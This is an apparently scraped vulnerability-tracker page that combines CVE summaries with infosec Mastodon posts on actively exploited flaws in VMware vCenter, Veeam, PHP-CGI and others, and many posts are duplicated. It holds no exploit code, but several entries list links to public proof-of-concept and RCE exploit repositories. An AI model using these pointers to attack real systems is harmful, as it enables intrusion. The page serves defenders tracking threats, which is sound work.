jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

screaminggoat at 2024-11-18T18:00:13.244Z ##

VMware security advisory 11/18 update: VMSA-2024-0019

VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.

cc: @cR0w @ntkramer @dreadpir8robots @campuscodi

##

screaminggoat@infosec.exchange at 2024-11-18T18:00:13.000Z ##

VMware security advisory 11/18 update: VMSA-2024-0019

VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.

cc: @cR0w @ntkramer @dreadpir8robots @campuscodi

#vmware #vcenter #vulnerability #cve #CVE_2024_38812 #CVE_2024_38813 #eitw #activeexploitation

##

AAKL at 2024-11-20T16:31:34.491Z ##

has updated the KEV catalogue. I wonder how much longer we will be able to do this.

- CVE-2024-38812: vCenter Server Heap-Based Buffer Overflow Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability cve.org/CVERecord?id=CVE-2024-

More:

- 2024 CWE Top 25 Most Dangerous Software Weaknesses cisa.gov/news-events/alerts/20

- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication cisa.gov/news-events/alerts/20 @cisacyber

##

cisakevtracker@mastodon.social at 2024-11-20T16:00:53.000Z ##

CVE ID: CVE-2024-38813
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Privilege Escalation Vulnerability
Notes: support.broadcom.com/web/ecx/s ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat at 2024-11-20T15:44:45.682Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-38812 (9.8 critical) VMware vCenter Server heap-overflow vulnerability
  • CVE-2024-38813 (7.5 high) VMware vCenter privilege escalation vulnerability

##

AAKL@infosec.exchange at 2024-11-20T16:31:34.000Z ##

#CISA has updated the KEV catalogue. I wonder how much longer we will be able to do this.

- CVE-2024-38812: #VMware vCenter Server Heap-Based Buffer Overflow Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability cve.org/CVERecord?id=CVE-2024-

More:

- 2024 CWE Top 25 Most Dangerous Software Weaknesses cisa.gov/news-events/alerts/20

- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication cisa.gov/news-events/alerts/20 @cisacyber #cybersecurity #infosec

##

cisakevtracker@mastodon.social at 2024-11-20T16:00:53.000Z ##

CVE ID: CVE-2024-38813
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Privilege Escalation Vulnerability
Notes: support.broadcom.com/web/ecx/s ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-20T15:44:45.000Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-38812 (9.8 critical) VMware vCenter Server heap-overflow vulnerability
  • CVE-2024-38813 (7.5 high) VMware vCenter privilege escalation vulnerability

#cisa #kev #cisakev #knownexploitedvulnerabilitiescatalog #vmware #vcenter #vulnerability #eitw #activeexploitation #infosec #cybersecurity

##

catc0n@infosec.exchange at 2024-11-18T21:49:05.000Z ##

And there's the advisory update, admittedly later than I was expecting: #VMware vCenter Server / Cloud Foundation CVE-2024-38812 and CVE-2024-38813 officially exploited in the wild, per Broadcom. support.broadcom.com/web/ecx/s

##

AAKL@infosec.exchange at 2024-11-18T20:44:11.000Z ##

Broadcom: #VMware vCenter Server updates address critical heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) support.broadcom.com/web/ecx/s

VMSA-2024-0019: Questions & Answers github.com/vmware/vcf-security @vmwaresrc

More: Critical RCE bug in VMware vCenter Server now exploited in attacks bleepingcomputer.com/news/secu @BleepingComputer @serghei #cybersecurity #infosec

##

screaminggoat@infosec.exchange at 2024-11-18T18:02:10.000Z ##

@neurovagrant VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813. support.broadcom.com/web/ecx/s

THE HITS JUST KEEP COMING

##

CVE-2024-38812
(9.8 CRITICAL)

EPSS: 0.09%

updated 2024-10-02T15:30:37

19 posts

The vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.

1 repos

https://github.com/groshi/CVE-2024-38812-POC-5-Hands-Private

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

jos1264@social.skynetcloud.site at 2024-11-18T19:30:03.000Z ##

VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw securityweek.com/vmware-disclo #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware

##

screaminggoat at 2024-11-18T18:00:13.244Z ##

VMware security advisory 11/18 update: VMSA-2024-0019

VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.

cc: @cR0w @ntkramer @dreadpir8robots @campuscodi

##

screaminggoat@infosec.exchange at 2024-11-18T18:00:13.000Z ##

VMware security advisory 11/18 update: VMSA-2024-0019

VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.

cc: @cR0w @ntkramer @dreadpir8robots @campuscodi

#vmware #vcenter #vulnerability #cve #CVE_2024_38812 #CVE_2024_38813 #eitw #activeexploitation

##

AAKL at 2024-11-20T16:31:34.491Z ##

has updated the KEV catalogue. I wonder how much longer we will be able to do this.

- CVE-2024-38812: vCenter Server Heap-Based Buffer Overflow Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability cve.org/CVERecord?id=CVE-2024-

More:

- 2024 CWE Top 25 Most Dangerous Software Weaknesses cisa.gov/news-events/alerts/20

- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication cisa.gov/news-events/alerts/20 @cisacyber

##

cisakevtracker@mastodon.social at 2024-11-20T16:05:20.000Z ##

CVE ID: CVE-2024-38812
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Heap-Based Buffer Overflow Vulnerability
Notes: support.broadcom.com/web/ecx/s ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat at 2024-11-20T15:44:45.682Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-38812 (9.8 critical) VMware vCenter Server heap-overflow vulnerability
  • CVE-2024-38813 (7.5 high) VMware vCenter privilege escalation vulnerability

##

AAKL@infosec.exchange at 2024-11-20T16:31:34.000Z ##

#CISA has updated the KEV catalogue. I wonder how much longer we will be able to do this.

- CVE-2024-38812: #VMware vCenter Server Heap-Based Buffer Overflow Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability cve.org/CVERecord?id=CVE-2024-

More:

- 2024 CWE Top 25 Most Dangerous Software Weaknesses cisa.gov/news-events/alerts/20

- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication cisa.gov/news-events/alerts/20 @cisacyber #cybersecurity #infosec

##

cisakevtracker@mastodon.social at 2024-11-20T16:05:20.000Z ##

CVE ID: CVE-2024-38812
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Heap-Based Buffer Overflow Vulnerability
Notes: support.broadcom.com/web/ecx/s ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-20T15:44:45.000Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-38812 (9.8 critical) VMware vCenter Server heap-overflow vulnerability
  • CVE-2024-38813 (7.5 high) VMware vCenter privilege escalation vulnerability

#cisa #kev #cisakev #knownexploitedvulnerabilitiescatalog #vmware #vcenter #vulnerability #eitw #activeexploitation #infosec #cybersecurity

##

catc0n@infosec.exchange at 2024-11-18T21:49:05.000Z ##

And there's the advisory update, admittedly later than I was expecting: #VMware vCenter Server / Cloud Foundation CVE-2024-38812 and CVE-2024-38813 officially exploited in the wild, per Broadcom. support.broadcom.com/web/ecx/s

##

AAKL@infosec.exchange at 2024-11-18T20:44:11.000Z ##

Broadcom: #VMware vCenter Server updates address critical heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) support.broadcom.com/web/ecx/s

VMSA-2024-0019: Questions & Answers github.com/vmware/vcf-security @vmwaresrc

More: Critical RCE bug in VMware vCenter Server now exploited in attacks bleepingcomputer.com/news/secu @BleepingComputer @serghei #cybersecurity #infosec

##

screaminggoat@infosec.exchange at 2024-11-18T18:02:10.000Z ##

@neurovagrant VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813. support.broadcom.com/web/ecx/s

THE HITS JUST KEEP COMING

##

CVE-2022-46751
(8.2 HIGH)

EPSS: 0.15%

updated 2024-09-30T13:35:28

1 posts

Improper Restriction of XML External Entity Reference, XML Injection (aka Blind XPath Injection) vulnerability in Apache Software Foundation Apache Ivy.This issue affects any version of Apache Ivy prior to 2.5.2. When Apache Ivy prior to 2.5.2 parses XML files - either its own configuration, Ivy files or Apache Maven POMs - it will allow downloading external document type definitions and expand a

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-47062
(8.8 HIGH)

EPSS: 0.05%

updated 2024-09-20T22:07:52

1 posts

# Security Advisory: Multiple Vulnerabilities in Navidrome ## Summary Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allo

Nuclei template

1 repos

https://github.com/saisathvik1/CVE-2024-47062

DarkWebInformer@infosec.exchange at 2024-11-13T15:59:20.000Z ##

🚨CVE-2024-47062 PoC; SQL Injection Vulnerability in Navidrome

github.com/saisathvik1/CVE-202

##

CVE-2024-45409
(10.0 CRITICAL)

EPSS: 16.41%

updated 2024-09-16T15:29:27

1 posts

Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system. This vulnerability was reported by ahacker1 of SecureSAML (ah

Nuclei template

1 repos

https://github.com/synacktiv/CVE-2024-45409

obivan@infosec.exchange at 2024-11-14T11:58:32.000Z ##

Ruby SAML CVE-2024-45409: As bad as it gets and hiding in plain sight workos.com/blog/ruby-saml-cve-

##

CVE-2024-40711
(9.8 CRITICAL)

EPSS: 96.69%

updated 2024-09-09T18:30:30

1 posts

A deserialization of untrusted data vulnerability with a malicious payload can allow an unauthenticated remote code execution (RCE).

Nuclei template

2 repos

https://github.com/watchtowrlabs/CVE-2024-40711

https://github.com/realstatus/CVE-2024-40711-Exp

screaminggoat@infosec.exchange at 2024-11-08T17:55:05.000Z ##

Sophos News: VEEAM exploit seen used again with a new ransomware: "Frag"
Sophos X-Ops observed threat activity cluster "STAC 5881" exploiting CVE-2024-40711 to deploy a new ransomware called Frag. They previously deployed Fog or Akira ransomware. No indicators shared.

Reference: CVE-2024-40711 (9.8 critical, disclosed 04 September 2024 by Veeam, has Proof of Concept and vulnerability details, added to CISA KEV Catalog 17 October 2024) Veeam Backup and Replication Deserialization Vulnerability

#akira #fog #ransomware #stac5881 #cybercrime #CVE_2024_40711 #veeam #threatintel #cyberthreatintelligence #cybersecurity #infosec #CTI

##

CVE-2024-42057
(8.1 HIGH)

EPSS: 0.09%

updated 2024-09-03T03:30:40

2 posts

A command injection vulnerability in the IPSec VPN feature of Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V4.16 through V5.38, and USG20(W)-VPN series firmware versions from V4.16 through V5.38 could allow an unauthenticated attacker to execute some OS commands on an affected d

screaminggoat at 2024-11-19T14:46:29.232Z ##

Sekoia: Helldown Ransomware: an overview of this emerging threat
Sekoia offers a threat actor profile for Helldown ransomware, a relatively new threat actor group performing double extortion (with a data leak site). A potential Zyxel vulnerability that Helldown exploits is CVE-2024-42057 (8.1 high, disclosed 03 September 2024) Zyxel firewall command injection vulnerability. They provide a technical analysis (dynamic and static) of both the Windows and Linux variants of Helldown ransomware. Indicators of compromise are listed.

##

screaminggoat@infosec.exchange at 2024-11-19T14:46:29.000Z ##

Sekoia: Helldown Ransomware: an overview of this emerging threat
Sekoia offers a threat actor profile for Helldown ransomware, a relatively new threat actor group performing double extortion (with a data leak site). A potential Zyxel vulnerability that Helldown exploits is CVE-2024-42057 (8.1 high, disclosed 03 September 2024) Zyxel firewall command injection vulnerability. They provide a technical analysis (dynamic and static) of both the Windows and Linux variants of Helldown ransomware. Indicators of compromise are listed.

#Helldown #ransomware #cybercrime #CVE_2024_42057 #zyxel #vulnerability #malwareanalysis #IOC #threatintel #infosec #cybersecurity #cyberthreatintelligence

##

CVE-2024-39717
(6.6 MEDIUM)

EPSS: 0.21%

updated 2024-08-27T18:31:36

2 posts

The Versa Director GUI provides an option to customize the look and feel of the user interface. This option is only available for a user logged with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin. (Tenant level users do not have this privilege). The “Change Favicon” (Favorite Icon) option can be mis-used to upload a malicious file ending with .png extension to masquerade as image

screaminggoat at 2024-11-19T15:17:16.761Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

##

screaminggoat@infosec.exchange at 2024-11-19T15:17:16.000Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

CVE-2024-5034
(8.8 HIGH)

EPSS: 0.04%

updated 2024-08-01T15:33:03

1 posts

The SULly WordPress plugin before 4.3.1 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

1 repos

#search_error

alex@bouma.social at 2024-11-19T10:50:25.000Z ##

@valorin I found this one a pretty good summary: blog.nollium.com/cve-2024-5034 although I believe Laravel applications were only impacted for the application environment name (production/staging etc.) and the debug flag was Symfony specific.

##

CVE-2017-0199
(7.8 HIGH)

EPSS: 97.50%

updated 2024-07-24T17:11:35.740000

1 posts

Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."

26 repos

https://github.com/n1shant-sinha/CVE-2017-0199

https://github.com/nicpenning/RTF-Cleaner

https://github.com/kn0wm4d/htattack

https://github.com/viethdgit/CVE-2017-0199

https://github.com/Phantomlancer123/CVE-2017-0199

https://github.com/herbiezimmerman/2017-11-17-Maldoc-Using-CVE-2017-0199

https://github.com/likekabin/CVE-2017-0199

https://github.com/stealth-ronin/CVE-2017-0199-PY-KIT

https://github.com/kash-123/CVE-2017-0199

https://github.com/joke998/Cve-2017-0199

https://github.com/sUbc0ol/Microsoft-Word-CVE-2017-0199-

https://github.com/joke998/Cve-2017-0199-

https://github.com/jacobsoo/RTF-Cleaner

https://github.com/NotAwful/CVE-2017-0199-Fix

https://github.com/haibara3839/CVE-2017-0199-master

https://github.com/SwordSheath/CVE-2017-8570

https://github.com/mzakyz666/PoC-CVE-2017-0199

https://github.com/BRAINIAC22/CVE-2017-0199

https://github.com/TheCyberWatchers/CVE-2017-0199-v5.0

https://github.com/SyFi/cve-2017-0199

https://github.com/Winter3un/cve_2017_0199

https://github.com/Nacromencer/cve2017-0199-in-python

https://github.com/Sunqiz/CVE-2017-0199-reprofuction

https://github.com/ryhanson/CVE-2017-0199

https://github.com/bhdresh/CVE-2017-0199

https://github.com/Exploit-install/CVE-2017-0199

screaminggoat@infosec.exchange at 2024-11-08T14:28:18.000Z ##

Fortinet: New Campaign Uses Remcos RAT to Exploit Victims
A phishing campaign is exploiting CVE-2017-0199 (7.8 high) Microsoft Office and WordPad Remote Code Execution Vulnerability to spread Remcos RAT. Indicators of compromise provided.

#remcosRAT #CVE_2017_0199 #IOC #threatintel #infosec #cybersecurity #cyberthreatintelligence #cti

##

CVE-2024-38094
(7.2 HIGH)

EPSS: 4.64%

updated 2024-07-09T18:31:01

1 posts

Microsoft SharePoint Remote Code Execution Vulnerability

catc0n@infosec.exchange at 2024-11-07T14:48:56.000Z ##

@screaminggoat No backchannels, full-on front channels. I messed up and reported this EITW in AttackerKB before the blog was ready to go out. Still accurate info, but I should've waited a few days so there were timely details available to the community along with the EITW report 😅 Lesson learned! attackerkb.com/topics/Ev24ZWs2

##

CVE-2024-4577
(9.8 CRITICAL)

EPSS: 96.32%

updated 2024-06-21T21:35:02

1 posts

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP bina

Nuclei template

54 repos

https://github.com/hexedbyte/cve-2024-4577

https://github.com/AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-

https://github.com/BitMEXResearch/CVE-2024-4577

https://github.com/nemu1k5ma/CVE-2024-4577

https://github.com/a-roshbaik/CVE-2024-4577-PHP-RCE

https://github.com/bibo318/CVE-2024-4577-RCE-ATTACK

https://github.com/phirojshah/CVE-2024-4577

https://github.com/XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE

https://github.com/JeninSutradhar/CVE-2024-4577-checker

https://github.com/longhoangth18/CVE-2024-4577

https://github.com/aaddmin1122345/cve-2024-4577

https://github.com/nNoSuger/CVE-2024-4577

https://github.com/ZephrFish/CVE-2024-4577-PHP-RCE

https://github.com/ahmetramazank/CVE-2024-4577

https://github.com/TAM-K592/CVE-2024-4577

https://github.com/zjhzjhhh/CVE-2024-4577

https://github.com/WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP

https://github.com/gotr00t0day/CVE-2024-4577

https://github.com/Sh0ckFR/CVE-2024-4577

https://github.com/0x20c/CVE-2024-4577-nuclei

https://github.com/princew88/CVE-2024-4577

https://github.com/ywChen-NTUST/PHP-CGI-RCE-Scanner

https://github.com/xcanwin/CVE-2024-4577-PHP-RCE

https://github.com/Wh02m1/CVE-2024-4577

https://github.com/l0n3m4n/CVE-2024-4577-RCE

https://github.com/dbyMelina/CVE-2024-4577

https://github.com/a-roshbaik/CVE-2024-4577

https://github.com/BTtea/CVE-2024-4577-RCE-PoC

https://github.com/ohhhh693/CVE-2024-4577

https://github.com/Junp0/CVE-2024-4577

https://github.com/jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE

https://github.com/11whoami99/CVE-2024-4577

https://github.com/Chocapikk/CVE-2024-4577

https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template

https://github.com/Sysc4ll3r/CVE-2024-4577

https://github.com/Jcccccx/CVE-2024-4577

https://github.com/AlperenY-cs/CVE-2024-4577

https://github.com/bl4cksku11/CVE-2024-4577

https://github.com/codeb0ss/CVEploiterv2

https://github.com/fa-rrel/CVE-2024-4577-RCE

https://github.com/charis3306/CVE-2024-4577

https://github.com/bughuntar/CVE-2024-4577

https://github.com/K3ysTr0K3R/CVE-2024-4577-EXPLOIT

https://github.com/d3ck4/Shodan-CVE-2024-4577

https://github.com/zomasec/CVE-2024-4577

https://github.com/watchtowrlabs/CVE-2024-4577

https://github.com/olebris/CVE-2024-4577

https://github.com/waived/CVE-2024-4577-PHP-RCE

https://github.com/ggfzx/CVE-2024-4577

https://github.com/Entropt/CVE-2024-4577_Analysis

https://github.com/PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough

https://github.com/VictorShem/CVE-2024-4577

https://github.com/manuelinfosec/CVE-2024-4577

https://github.com/taida957789/CVE-2024-4577

CVE-2024-35250
(7.8 HIGH)

EPSS: 0.04%

updated 2024-06-20T18:35:10

2 posts

Windows Kernel-Mode Driver Elevation of Privilege Vulnerability

1 repos

#search_error

CVE-2024-30103
(8.8 HIGH)

EPSS: 0.09%

updated 2024-06-11T18:30:56

1 posts

Microsoft Outlook Remote Code Execution Vulnerability

CVE-2024-30051
(7.8 HIGH)

EPSS: 0.08%

updated 2024-05-16T20:27:22.830000

1 posts

Windows DWM Core Library Elevation of Privilege Vulnerability

1 repos

https://github.com/fortra/CVE-2024-30051

CVE-2024-4351
(8.8 HIGH)

EPSS: 0.05%

updated 2024-05-16T12:30:29

1 posts

The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'authenticate' function in all versions up to, and including, 2.7.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to gain control of an existing administrator account.

1 repos

https://github.com/ZSECURE/CVE-2024-4351

screaminggoat@infosec.exchange at 2024-11-13T18:13:40.000Z ##

ClearSky: CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
Reference: CVE-2024-43451 (6.5 medium, disclosed 12 November 2024 by Microsoft as an exploited zero-day, added to CISA KEV Catalog same day) NTLM Hash Disclosure Spoofing Vulnerability

ClearSky reports that CVE-2024-43451 was exploited in the wild against Ukrainian entities when it was discovered in June 2024. A compromised Ukrainian government server sent phishing emails which contained a malicious URL file. Any interaction triggers the vulnerability which establishes a connection with the attacker's server and downloads further malicious files like SparkRAT. The campaign is attributed to the suspected Russian threat actor group UAC-0194. See the 14 page PDF report. Indicators of compromise are listed inside.

#CVE_2024_43451 #vulnerability #eitw #activeexploitation #kev #uac0194 #russia #russiaukrainewar #ukraine #cyberespionage #cyberthreatintelligence #threatintel #cybersecurity #infosec #CTI #IOC #sparkRAT

##

CVE-2024-3400
(9.8 CRITICAL)

EPSS: 96.41%

updated 2024-04-29T05:02:31

1 posts

A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NG

Nuclei template

1 repos

#search_error

cR0w@infosec.exchange at 2024-11-18T14:07:57.000Z ##

@krypt3ia No kidding. The impact hasn't been as bad, but the communication is so much worse than even the CVE-2024-3400 shitshow. Definitely feels like something's up. Like someone else is using the same vuln and doesn't want access to get burned yet, IDK.

##

CVE-2023-27944
(8.6 HIGH)

EPSS: 0.06%

updated 2024-04-11T21:19:47

1 posts

This issue was addressed with a new entitlement. This issue is fixed in macOS Ventura 13.3, macOS Monterey 12.6.4, macOS Big Sur 11.7.5. An app may be able to break out of its sandbox

technotenshi@infosec.exchange at 2024-11-08T18:14:14.000Z ##

New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.

jhftss.github.io/A-New-Era-of-

#macOS #Infosec #SandboxEscape #CVE

##

ligniform at 2024-11-20T19:38:21.428Z ##

@cR0w This is from a client lol, AlienVault is flagging 127.0.0.0/8 connections as cve-2024-26229 IOCs 🙄

##

ligniform@infosec.exchange at 2024-11-20T19:38:21.000Z ##

@cR0w This is from a client lol, AlienVault is flagging 127.0.0.0/8 connections as cve-2024-26229 IOCs 🙄

##

oversecurity@mastodon.social at 2024-11-12T16:20:05.000Z ##

Surge in exploits of zero-day vulnerabilities is ‘new normal’ warns Five Eyes alliance

In a co-authored advisory, the agencies list the top 15 most routinely exploited vulnerabilities of 2023, with CVE-2023-3519 — an issue affecting...

🔗️ [Therecord] link.is.it/t2ct9p

##

CVE-2023-32414
(8.6 HIGH)

EPSS: 0.05%

updated 2024-04-04T05:08:19

1 posts

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.4. An app may be able to break out of its sandbox

technotenshi@infosec.exchange at 2024-11-08T18:14:14.000Z ##

